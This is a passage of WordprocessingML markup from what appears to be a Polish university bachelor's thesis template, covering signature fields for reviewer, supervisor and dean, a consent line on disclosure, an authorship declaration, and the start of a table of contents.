                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5528" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C00E38C" w14:textId="7114371C" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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29264D6C" w14:textId="36F91957" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="007B6EB7">
            <w:pPr>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 xml:space="preserve">Wynik studiów: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CA9A6E7" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2374C2C3" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:ind w:firstLine="709"/>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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51607A52" w14:textId="772EE5D8" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="003C7B6F">
      <w:pPr>
        <w:spacing w:before="240"/>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Reviewer</w:t>
      </w:r>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: ............................ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Supervisor</w:t>
      </w:r>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: ...................................</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dean</w:t>
      </w:r>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00866CEF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.......</w:t>
      </w:r>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...........</w:t>
      </w:r>
      <w:r w:rsidR="00866CEF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D418090" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E592952" w14:textId="5434E054" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="0012645B">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="5387"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>I consent / I do not consent to the disclosure of my thesis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D930D59" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:ind w:left="6379" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D73F204" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:ind w:left="5529" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.................   ............................. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04183F66" w14:textId="5217B572" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="003C7B6F">
      <w:pPr>
        <w:ind w:left="6521"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dat</w:t>
      </w:r>
      <w:r w:rsidR="0012645B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidR="0012645B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DCB80E" w14:textId="77777777" w:rsidR="003C7B6F" w:rsidRPr="00D77DFE" w:rsidRDefault="003C7B6F" w:rsidP="00DD54CA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CE2B0C" w14:textId="77777777" w:rsidR="00737EAA" w:rsidRPr="00D77DFE" w:rsidRDefault="00737EAA" w:rsidP="00DD54CA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>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1"/>
        <w:gridCol w:w="4102"/>
      </w:tblGrid>
      <w:tr w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w14:paraId="5A84F6DC" w14:textId="77777777" w:rsidTr="00866CEF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4401" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B8D0311" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="007B6EB7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="8506"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>………………..........................................</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BBBA0C2" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="007B6EB7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="8506"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Imię i Nazwisko</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4102" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0812F671" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="007B6EB7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="8506"/>
              </w:tabs>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Gdynia, dnia [data oświadczenia] r.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74FA0BDC" w14:textId="14B80D52" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="00866CEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1200" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc223521072"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="37A5EBE3" w14:textId="4044AE68" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:before="240"/>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Aware of legal responsibility, I hereby declare that the submitted Bachelor’s entitled: [title of the thesis] has been written independently by me.</w:t>
      </w:r>
      <w:r w:rsidR="00866CEF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73572BC5" w14:textId="3D75FA4F" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="00866CEF">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>At the same time, I declare that only the cited literature has been used in this thesis, and therefore the work does not infringe copyright within the meaning of the Act of 4 February 1994 on Copyright and Related Rights (Journal of Laws 1994, No. 24, item 83), nor does it violate personal rights protected by civil law.</w:t>
      </w:r>
      <w:r w:rsidR="00866CEF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4CDF83" w14:textId="77777777" w:rsidR="0012645B" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="00866CEF">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Furthermore, I declare that the thesis does not contain information or data obtained in an illegal manner and has not previously been the subject of any official procedures related to obtaining academic degrees or professional titles at a higher education institution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B7AB3" w14:textId="0507D1D3" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="00866CEF">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I also declare that this version of the thesis is identical to the attached electronic version on the CD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4F0EC0" w14:textId="1430840C" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="0012645B" w:rsidP="00866CEF">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Pursuant to Article 75 §2 of the Code of Administrative Procedure, I request that this declaration be accepted as evidence of the truthfulness of the circumstances stated herein, being fully aware of the criminal liability under Article 233 §1 and §6 of the Penal Code for making a false declaration.</w:t>
      </w:r>
      <w:r w:rsidR="00866CEF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5C0E6" w14:textId="6CF8E65F" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:before="600" w:after="480"/>
        <w:ind w:left="4956"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">………………………………………  </w:t>
      </w:r>
      <w:r w:rsidR="0012645B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6766A8D2" w14:textId="6FF63FFF" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">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 * </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>niepotrzebne</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> skreślić</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438E23C9" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB39539" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A79B77F" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B2192E" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7309F170" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D65D85" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBD0DA0" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E2D524" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281237EF" w14:textId="77777777" w:rsidR="00866CEF" w:rsidRPr="00D77DFE" w:rsidRDefault="00866CEF" w:rsidP="00866CEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B53D75" w14:textId="77777777" w:rsidR="00FC5260" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC5260" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="2" w:name="_Toc219142046" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorBidi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-001"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1250114883"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="3E71B7ED" w14:textId="4626D4CE" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D77DFE">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
